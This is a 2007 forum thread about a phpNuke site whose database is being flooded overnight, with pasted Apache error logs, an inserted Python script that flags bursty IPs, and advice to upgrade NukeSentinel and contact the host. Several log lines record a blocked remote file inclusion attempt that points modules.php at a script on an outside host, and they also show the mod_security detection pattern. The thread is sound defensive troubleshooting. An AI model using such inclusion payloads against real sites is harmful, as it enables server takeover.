Yes, they are attacking my site somehow, flooding the SQL user with > 50,000 queries. Our host only supports 50,000 max queries, and what is happening is some IP-spoofing ass is constantly flooding our site. I get up in the morning and we have some funky SQL error. I try a few pages and then I get the message that the user has exceeded the limit.
I have everything in Sentinel turned up; it's also the latest version, and yet they still seem to be flooding our site. Maybe I can set up Sentinel a little further or something, but even so, the last user whom I see attacking is like going to modules.php or doing funky searches. I've already barred guests from searching...
This goes on from like 1am to almost 7am, basically just before I get up in the morning. I then have to create yet another SQL user and update the config.cfg... Getting ridiculous.
[Mon Oct 15 01:12:31 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce2.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:12:33 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:12:41 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce2.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:13:17 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:15:50 2007] [error] [client 72.30.61.80] File does not exist: /home/frontli1/public_html/files/TEKKEN5-DR.html
[Mon Oct 15 01:17:11 2007] [error] [client 194.8.176.2] File does not exist: /home/frontli1/public_html/forums/index.php
[Mon Oct 15 01:18:33 2007] [error] [client 218.58.136.4] File does not exist: /home/frontli1/public_html/forums/index.php
[Mon Oct 15 01:19:39 2007] [error] [client 83.130.251.189] File does not exist: /home/frontli1/public_html/forums/index.php
[Mon Oct 15 01:24:29 2007] [error] [client 74.6.22.39] File does not exist: /home/frontli1/public_html/forums/lofiversion/index.php/t1067.html
[Mon Oct 15 01:32:03 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:04 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:05 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:05 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:07 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:09 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:10 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:10 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:11 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:13 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:15 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:15 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
Client denied, yet it seems to take down our SQL user and I have to create a new one because the host only allows a maximum of 50,000 queries at a time.
Also, IP lookup says it's Microsoft / MSN!!??? wtf!
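A small log-triage script, added here as an example and not code from the thread, from phpNuke or from NukeSentinel: it parses error_log lines in the shape shown above and reports any client IP that produces more than a set number of hits inside a sliding time window, which is the kind of per-IP evidence a host needs before it will rate-limit or block a source. The sample lines are constructed to mirror the post's format; the paths and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache 2.x error_log shape seen in the post, e.g.
# [Mon Oct 15 01:32:03 2007] [error] [client 65.55.213.7] client denied by server configuration: /path
LINE_RE = re.compile(
    r"^\[(?P<ts>[A-Z][a-z]{2} [A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d \d{4})\] "
    r"\[(?P<level>\w+)\] \[client (?P<ip>[0-9.]+)\] (?P<msg>.*)$"
)

def parse_line(line):
    """Return {'ts', 'ip', 'msg'} for a well-formed line, None otherwise."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return {"ts": ts, "ip": m.group("ip"), "msg": m.group("msg")}

def find_bursts(lines, window_seconds=60, threshold=10):
    """Map each client IP to the most hits it produced inside any
    window_seconds-long sliding window; only IPs at/over threshold are kept."""
    per_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            per_ip[ev["ip"]].append(ev["ts"])
    win = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        best, start = 0, 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > win:   # slide the window's left edge forward
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged

# Constructed sample lines in the post's format (not the poster's real log file).
SAMPLE = [
    "[Mon Oct 15 01:12:31 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406.",
    "[Mon Oct 15 01:15:50 2007] [error] [client 72.30.61.80] File does not exist: /home/example/public_html/x.html",
    "not a log line at all",
] + [
    ("[Mon Oct 15 01:32:%02d 2007] [error] [client 65.55.213.7] client denied by server configuration: "
     "/home/example/public_html/content/modules.php") % s for s in range(3, 15)
]
```

Running `find_bursts(SAMPLE)` on the constructed data reports only 65.55.213.7 with 12 hits in one window, the same pattern the log excerpt above shows; the non-matching line is skipped rather than crashing the parser.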
OK, why in Admin is it saying my Sentinel is up to date at 2.5.08 when 2.5.13 is available? Can I simply follow the readme to upgrade? That's a bug, I imagine, since it didn't pick up a later version that fixes SQL injections.... Sigh.
Even with mod_security, it looks like they are hammering your site. Even an updated Nuke Sentinel won't stop it; Sentinel requires SQL queries to function.
You'll really need to work with your host on stopping such denial of service.
Or get a better host; a 50,000 query limit is just not acceptable for a database-intensive script like phpNuke.
modules.php is the major file phpNuke uses. There is no way you could disable it and still have your site functioning.
There are some security issues with previous versions. You should still upgrade your Nuke Sentinel version. However, its flood protection will not stop the hits to your server.